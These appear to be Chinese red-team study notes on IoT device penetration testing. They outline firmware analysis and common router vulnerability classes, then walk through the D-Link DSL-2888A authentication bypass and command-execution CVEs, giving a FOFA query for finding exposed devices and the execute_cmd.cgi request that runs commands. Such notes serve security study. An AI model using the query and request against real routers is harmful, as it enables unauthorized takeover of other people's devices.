红队专题
设备安全概述
Nday 案例分析
黑盒白盒 方法
物联网设备层次模型
- 固件提取 Rom flash 数据提取
内核 文件系统
二进制逆向分析
pcb 攻击
设备通信模型
渗透测试
信息收集
反向代理
交换机端口镜像
串口 usb--ttl
tcpdump
管理口
rtsp 视频传输 解析
9898 控制端口
工具
依赖 固件模拟
实战分析
抓包 信息泄露
诊断 ping? 命令执行
配置导出 配置文件信息 信息泄露 越权
漏洞切入点
堆栈溢出
读写
格式化字符串
私有协议 - 端口
后门-调试维护
D-link 850L 未授权访问 2017 认证绕过
PHP + C++
CGI
文件读取
认证绕过 D-link DCS-2530L
固件 --->字符串 --->web 路径 --->重放
tenda 系列 路由器 前台未授权
未授权 + 命令执行
RTSP 服务未授权 访问
逆向rtsp 进程
字符串 访问路径
弱口令
命令注入
思科 路由器
加入随机字符
看设备 是否正常
固件二进制 漏洞
IoT漏洞-D-Link路由
CVE-2020-24581/24579 RCE
简介
D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本漏洞源于
包含一个execute cmd.cgi特性、该特性允许经过身份验证的用户执行操作系统命令,
在该版本固件中同时存在着一个
不安全认证漏洞(CVE-2020-24580),
在登录界面输入任意密码就可以成功访问路由器界面,
组合这两个漏洞以实现未授权的任意代码执行。
影响范围
AU_2.31_V1.1.47ae55 <=
EG_1.00b4
FOFA
body="DSL-2888A" && server=="uhttpd" && status_code=="200"
访问主页
/page/login/login.html
这里不管什么参数都会识别,参数没有进行限制
首先输入任意用户名密码,待提示登陆失败后继续进行下一步
/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig